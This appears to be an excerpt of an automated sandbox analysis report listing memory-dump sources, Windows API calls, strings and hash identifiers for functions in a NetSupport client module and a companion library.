                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                        • String ID:
                                                                                        • API String ID: 3991485460-0
                                                                                        • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                        • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                        • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                        • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                        APIs
                                                                                        • inet_ntoa.WSOCK32(00000080,?,00000000,?,6D1C8F91,00000000,00000000,6D20B8DA,?,00000080), ref: 6D1C5852
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: inet_ntoa
                                                                                        • String ID: gfff
                                                                                        • API String ID: 1879540557-1553575800
                                                                                        • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                        • Instruction ID: 7a69c833444ff0d0c7b0244e1ecc5904b7ff167726e1d023e86c25394f119e99
                                                                                        • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                        • Instruction Fuzzy Hash: 8811C2217082D78BD3228A2E98602F7BFD5DFB7240B1C4469D9C9CB305C655D409C7D2
                                                                                        APIs
                                                                                          • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                        • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                          • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                        Strings
                                                                                        • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenwvsprintf
                                                                                        • String ID: Error %d Opening regkey %s
                                                                                        • API String ID: 1772833024-3994271378
                                                                                        • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                        • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                        • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                        • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                        APIs
                                                                                        • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                          • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                        Strings
                                                                                        • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Closewvsprintf
                                                                                        • String ID: Error %d closing regkey %x
                                                                                        • API String ID: 843752472-892920262
                                                                                        • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                        • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                        • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                        • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,0316B898,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                          • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HandleLibraryLoadModule
                                                                                        • String ID: NSMTRACE
                                                                                        • API String ID: 4133054770-4175627554
                                                                                        • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                        • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                        • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                        • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,6D1C8DC8), ref: 6D1C4F78
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: psapi.dll
                                                                                        • API String ID: 1029625771-80456845
                                                                                        • Opcode ID: c316640451f23893462dbe31da6c1cd64cf63c1b448d883d61dcb4a8418ef400
                                                                                        • Instruction ID: 6d8a677efc8f2b0e1ab5e0c105945d6378754845166fa22823a3e433a5e62d0e
                                                                                        • Opcode Fuzzy Hash: c316640451f23893462dbe31da6c1cd64cf63c1b448d883d61dcb4a8418ef400
                                                                                        • Instruction Fuzzy Hash: 0CE001B1901B108F93B0CF3AA604643BAF0BB186503118A2E909EC3A00E370A585CF90
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: psapi.dll
                                                                                        • API String ID: 1029625771-80456845
                                                                                        • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                        • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                        • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                        • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                        APIs
                                                                                        • ioctlsocket.WSOCK32(92DF34B3,4004667F,00000000,-000397EB), ref: 6D1C5D1F
                                                                                        • select.WSOCK32(00000001,?,00000000,?,00000000,92DF34B3,4004667F,00000000,-000397EB), ref: 6D1C5D62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ioctlsocketselect
                                                                                        • String ID:
                                                                                        • API String ID: 1457273030-0
                                                                                        • Opcode ID: b940b5cd7bb554e3ec92620cb12e7d31b6711ca73b2bd2cf6b34681ec584d529
                                                                                        • Instruction ID: 3632af6fd4c1de518cb27a1af7f9b473530e8af4b7314bcee4ecffd3f8a6d231
                                                                                        • Opcode Fuzzy Hash: b940b5cd7bb554e3ec92620cb12e7d31b6711ca73b2bd2cf6b34681ec584d529
                                                                                        • Instruction Fuzzy Hash: E9213071A003188BEB28CF14C958BEDB7B9EF48304F4081DAA90D97285DBB45F94DF91
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1338273076-0
                                                                                        • Opcode ID: 1f80237bb8b33227715ec78827a33b9d1a9a742048f9e05dafa60b126eb6fb5b
                                                                                        • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                        • Opcode Fuzzy Hash: 1f80237bb8b33227715ec78827a33b9d1a9a742048f9e05dafa60b126eb6fb5b
                                                                                        • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 110883EF
                                                                                        • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection_memset
                                                                                        • String ID:
                                                                                        • API String ID: 453477542-0
                                                                                        • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                        • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                        • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                        • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                        • ExtractIconExA.SHELL32(?,00000000,00030443,00040449,00000001), ref: 11144498
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExtractFileIconModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 3911389742-0
                                                                                        • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                        • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                        • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                        • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                        APIs
                                                                                          • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                        • __lock_file.LIBCMT ref: 11163DFE
                                                                                          • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                        • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                        • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                        • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                        • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D6C26
                                                                                        • Sleep.KERNEL32(00000064), ref: 6D1D6C5B
                                                                                          • Part of subcall function 6D1D6940: GetTickCount.KERNEL32 ref: 6D1D6950
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
